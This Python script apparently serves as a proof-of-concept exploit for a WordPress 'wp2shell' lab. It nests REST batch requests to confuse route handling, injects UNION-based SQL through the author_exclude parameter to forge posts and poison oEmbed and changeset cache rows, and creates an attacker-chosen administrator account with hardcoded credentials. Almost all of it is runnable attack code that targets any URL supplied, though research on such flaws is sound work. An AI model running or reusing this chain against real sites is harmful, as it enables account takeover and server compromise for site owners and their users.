#!/usr/bin/env python3
"""Minimal source-derived probe for the isolated WordPress wp2shell lab."""

from __future__ import annotations

import argparse
import json
import re
import time
import urllib.error
import urllib.parse
import urllib.request


def nested_batch(
    author_exclude: str,
    full_row: bool = False,
    attacker: dict | None = None,
) -> dict:
    primer = {"method": "POST", "path": "///"}
    confused_path = "/wp/v2/users"
    if full_row:
        confused_path = "/wp/v2/users/1?per_page=500&orderby=none"
    separator = "&" if "?" in confused_path else "?"
    inner = {
        "requests": [
            primer,
            {
                "method": "GET",
                "path": confused_path
                + separator
                + "author_exclude="
                + urllib.parse.quote(author_exclude, safe=""),
            },
            {"method": "GET", "path": "/wp/v2/posts"},
        ]
    }
    if attacker is not None:
        # The malformed first request shifts the next route's handler onto this
        # request. Under the re-entered administrator context, this body is
        # handled by WP_REST_Users_Controller::create_item().
        inner["requests"].extend(
            [
                {
                    "method": "POST",
                    "path": "/wp/v2/posts",
                    "body": attacker,
                },
                {
                    "method": "POST",
                    "path": "/wp/v2/users",
                    "body": {},
                },
            ]
        )
    return {
        "requests": [
            primer,
            {"method": "POST", "path": "/wp/v2/posts", "body": inner},
            {
                "method": "POST",
                "path": "/batch/v1",
                "body": {"requests": []},
            },
        ]
    }


def send(
    base_url: str,
    injection: str,
    full_row: bool = False,
    attacker: dict | None = None,
) -> tuple[int, float, str]:
    return send_payload(
        base_url,
        nested_batch(injection, full_row=full_row, attacker=attacker),
    )


def sql_literal(value: str) -> str:
    return "'" + value.replace("\\", "\\\\").replace("'", "''") + "'"


def forged_post_columns(
    content: str,
    post_id: int = 424242,
    *,
    post_type: str = "post",
    post_status: str = "publish",
    post_name: str = "pruva-forged",
    post_title: str = "PRUVA-FORGED-TITLE",
    post_parent: int = 0,
    post_date_sql: str = "NOW()",
    post_date_gmt_sql: str = "NOW()",
) -> list[str]:
    return [
        str(post_id),
        "0",
        post_date_sql,
        post_date_gmt_sql,
        sql_literal(content),
        sql_literal(post_title),
        "''",
        sql_literal(post_status),
        "'closed'",
        "'closed'",
        "''",
        sql_literal(post_name),
        "''",
        "''",
        "NOW()",
        "NOW()",
        "''",
        str(post_parent),
        "'http://invalid/pruva-forged'",
        "0",
        sql_literal(post_type),
        "''",
        "0",
    ]


def forged_post_union(content: str, post_id: int = 424242) -> str:
    columns = forged_post_columns(content, post_id)
    return "0) AND 1=0 UNION ALL SELECT " + ",".join(columns) + " -- -"


def forged_rows_union(rows: list[list[str]]) -> str:
    return (
        "0) AND 1=0 UNION ALL SELECT "
        + " UNION ALL SELECT ".join(",".join(row) for row in rows)
        + " -- -"
    )


def lookup_rows_union(where_sql: str, limit: int = 1) -> str:
    if limit < 1 or limit > 20:
        raise ValueError("lookup limit must be between 1 and 20")
    columns = [
        "ID",
        "0",
        "NOW()",
        "NOW()",
        "CONCAT('PRUVA-LOOKUP:',ID,':',COALESCE(post_name,''))",
        "CONCAT('PRUVA-LOOKUP:',ID,':',COALESCE(post_name,''))",
        "''",
        "'publish'",
        "'closed'",
        "'closed'",
        "''",
        "CONCAT('pruva-lookup-',ID)",
        "''",
        "''",
        "NOW()",
        "NOW()",
        "''",
        "0",
        "'http://invalid/pruva-lookup'",
        "0",
        "'post'",
        "''",
        "0",
    ]
    return (
        "0) AND 1=0 UNION ALL SELECT "
        + ",".join(columns)
        + " FROM wp_posts WHERE "
        + where_sql
        + " -- -"
    )


def extract_lookup_rows(body: str) -> list[tuple[int, str]]:
    data = json.loads(body)
    found: dict[int, str] = {}

    def walk(value: object) -> None:
        if isinstance(value, dict):
            for child in value.values():
                walk(child)
        elif isinstance(value, list):
            for child in value:
                walk(child)
        elif isinstance(value, str):
            for match in re.finditer(r"PRUVA-LOOKUP:(\d+):([a-zA-Z0-9_-]*)", value):
                found[int(match.group(1))] = match.group(2)

    walk(data)
    return sorted(found.items(), reverse=True)


def changeset_payload(stylesheet: str, css: str, user_id: int) -> str:
    return json.dumps(
        {
            f"custom_css[{stylesheet}]": {
                "value": css,
                "type": "custom_css",
                "user_id": user_id,
            }
        },
        separators=(",", ":"),
    )


def changeset_cache_chain_union(
    *,
    cache_id: int,
    cache_name: str,
    embed_url: str,
    changeset_id: int,
    loop_id: int,
    changeset_uuid: str,
    changeset_content: str,
    extra_rows: list[list[str]] | None = None,
) -> str:
    rows = [
        forged_post_columns(
            "0",
            cache_id,
            post_type="oembed_cache",
            post_status="publish",
            post_name=cache_name,
            post_parent=changeset_id,
        ),
        forged_post_columns(
            changeset_content,
            changeset_id,
            post_type="customize_changeset",
            post_status="future",
            post_name=changeset_uuid,
            post_parent=loop_id,
        ),
        forged_post_columns(
            "loop-sentinel",
            loop_id,
            post_type="post",
            post_status="publish",
            post_name="pruva-loop-sentinel",
            post_parent=changeset_id,
        ),
    ]
    rows.extend(extra_rows or [])
    rows.append(
        forged_post_columns(
            f"[embed]{embed_url}[/embed]",
            0,
            post_name="pruva-oembed-trigger",
        )
    )
    return forged_rows_union(rows)


def default_attacker(username: str, password: str, email: str) -> dict:
    return {
        "username": username,
        "password": password,
        "email": email,
        "roles": ["administrator"],
    }


def oembed_promote_union(
    cache_id: int,
    embed_url: str,
    changeset_uuid: str,
    *,
    post_type: str = "customize_changeset",
    post_status: str = "future",
) -> str:
    future_date = "DATE_ADD(NOW(), INTERVAL 75 SECOND)"
    date_sql = future_date if post_status == "future" else "NOW()"
    poisoned_cache = forged_post_columns(
        "0",
        cache_id,
        post_type=post_type,
        post_status=post_status,
        post_name=changeset_uuid,
        post_date_sql=date_sql,
        post_date_gmt_sql=date_sql,
    )
    trigger = forged_post_columns(
        f"[embed]{embed_url}[/embed]",
        0,
        post_name="pruva-oembed-trigger",
    )
    return (
        "0) AND 1=0 UNION ALL SELECT "
        + ",".join(poisoned_cache)
        + " UNION ALL SELECT "
        + ",".join(trigger)
        + " -- -"
    )


def user_creation_batch() -> dict:
    primer = {"method": "POST", "path": "///"}
    attacker = {
        "username": "route_confusion_admin",
        "password": "AttackerChosen-Route-Confusion-2026!",
        "email": "route-confusion-admin@invalid.test",
        "roles": ["administrator"],
    }
    inner = {
        "requests": [
            primer,
            {
                "method": "POST",
                "path": "/wp/v2/posts",
                "body": {
                    "title": "permission-boundary probe",
                    **attacker,
                },
            },
            {"method": "POST", "path": "/wp/v2/users", "body": attacker},
        ]
    }
    return {
        "requests": [
            primer,
            {"method": "POST", "path": "/wp/v2/posts", "body": inner},
            {
                "method": "POST",
                "path": "/batch/v1",
                "body": {"requests": []},
            },
        ]
    }


def send_payload(base_url: str, payload: dict) -> tuple[int, float, str]:
    request = urllib.request.Request(
        base_url.rstrip("/") + "/wp-json/batch/v1",
        data=json.dumps(payload).encode(),
        method="POST",
        headers={"Content-Type": "application/json", "User-Agent": "pruva-source-lab"},
    )
    started = time.monotonic()
    try:
        with urllib.request.urlopen(request, timeout=20) as response:
            return response.status, time.monotonic() - started, response.read().decode()
    except urllib.error.HTTPError as error:
        return error.code, time.monotonic() - started, error.read().decode()


def main() -> int:
    parser = argparse.ArgumentParser()
    parser.add_argument("base_url")
    parser.add_argument("injection", nargs="?")
    parser.add_argument("--user-creation", action="store_true")
    parser.add_argument("--full-row", action="store_true")
    parser.add_argument("--forged-content")
    parser.add_argument("--post-id", type=int, default=424242)
    parser.add_argument("--oembed-promote-cache-id", type=int)
    parser.add_argument("--embed-url")
    parser.add_argument("--poison-post-type", default="customize_changeset")
    parser.add_argument("--poison-post-status", default="future")
    parser.add_argument("--bootstrap-custom-css", action="store_true")
    parser.add_argument("--admin-chain", action="store_true")
    parser.add_argument("--cache-id", type=int)
    parser.add_argument("--cache-name")
    parser.add_argument("--changeset-id", type=int, default=3)
    parser.add_argument("--loop-id", type=int, default=4)
    parser.add_argument("--custom-css-id", type=int)
    parser.add_argument("--parse-id", type=int, default=1)
    parser.add_argument("--parse-loop-id", type=int, default=2)
    parser.add_argument("--stylesheet", default="twentytwentyfive")
    parser.add_argument("--admin-username", default="pruva_chain_admin")
    parser.add_argument(
        "--admin-password",
        default="Pruva-Route-Confusion-Admin-2026!",
    )
    parser.add_argument("--admin-email", default="pruva-chain-admin@invalid.test")
    parser.add_argument("--lookup-oembed", action="store_true")
    parser.add_argument("--lookup-custom-css", action="store_true")
    parser.add_argument("--lookup-limit", type=int, default=1)
    parser.add_argument(
        "--changeset-uuid",
        default="11111111-2222-4333-8444-555555555555",
    )
    args = parser.parse_args()
    if args.lookup_oembed or args.lookup_custom_css:
        if args.lookup_oembed:
            where_sql = "post_type='oembed_cache'"
        else:
            where_sql = (
                "post_type='custom_css' AND post_name="
                + sql_literal(args.stylesheet)
            )
        status, elapsed, body = send(
            args.base_url,
            lookup_rows_union(where_sql, args.lookup_limit),
            full_row=True,
        )
        print(
            json.dumps(
                {
                    "status": status,
                    "elapsed": elapsed,
                    "rows": extract_lookup_rows(body)[: args.lookup_limit],
                }
            )
        )
        return 0
    if args.bootstrap_custom_css or args.admin_chain:
        if not args.cache_id or not args.cache_name or not args.embed_url:
            parser.error(
                "the cache-chain modes require --cache-id, --cache-name, and --embed-url"
            )
        content = changeset_payload(
            args.stylesheet,
            "body{--pruva-chain:1}",
            1,
        )
        extra_rows: list[list[str]] = []
        attacker = None
        if args.admin_chain:
            if not args.custom_css_id:
                parser.error("--admin-chain requires --custom-css-id")
            extra_rows.extend(
                [
                    forged_post_columns(
                        "body{--pruva-poisoned-css:1}",
                        args.custom_css_id,
                        post_type="custom_css",
                        post_status="publish",
                        post_name=args.stylesheet,
                        post_title=args.stylesheet,
                        post_parent=args.parse_id,
                    ),
                    forged_post_columns(
                        "parse-request-bridge",
                        args.parse_id,
                        post_type="request",
                        post_status="parse",
                        post_name="pruva-parse-request",
                        post_parent=args.parse_loop_id,
                    ),
                    forged_post_columns(
                        "parse-loop-sentinel",
                        args.parse_loop_id,
                        post_type="post",
                        post_status="publish",
                        post_name="pruva-parse-loop",
                        post_parent=args.parse_id,
                    ),
                ]
            )
            attacker = default_attacker(
                args.admin_username,
                args.admin_password,
                args.admin_email,
            )
        injection = changeset_cache_chain_union(
            cache_id=args.cache_id,
            cache_name=args.cache_name,
            embed_url=args.embed_url,
            changeset_id=args.changeset_id,
            loop_id=args.loop_id,
            changeset_uuid=args.changeset_uuid,
            changeset_content=content,
            extra_rows=extra_rows,
        )
        status, elapsed, body = send(
            args.base_url,
            injection,
            full_row=True,
            attacker=attacker,
        )
    elif args.user_creation:
        status, elapsed, body = send_payload(args.base_url, user_creation_batch())
    elif args.forged_content is not None:
        status, elapsed, body = send(
            args.base_url,
            forged_post_union(args.forged_content, post_id=args.post_id),
            full_row=True,
        )
    elif args.oembed_promote_cache_id is not None:
        if not args.embed_url:
            parser.error("--oembed-promote-cache-id requires --embed-url")
        status, elapsed, body = send(
            args.base_url,
            oembed_promote_union(
                args.oembed_promote_cache_id,
                args.embed_url,
                args.changeset_uuid,
                post_type=args.poison_post_type,
                post_status=args.poison_post_status,
            ),
            full_row=True,
        )
    elif args.injection is not None:
        status, elapsed, body = send(args.base_url, args.injection, full_row=args.full_row)
    else:
        parser.error("provide an injection or --user-creation")
    print(json.dumps({"status": status, "elapsed": elapsed, "body": json.loads(body)}))
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
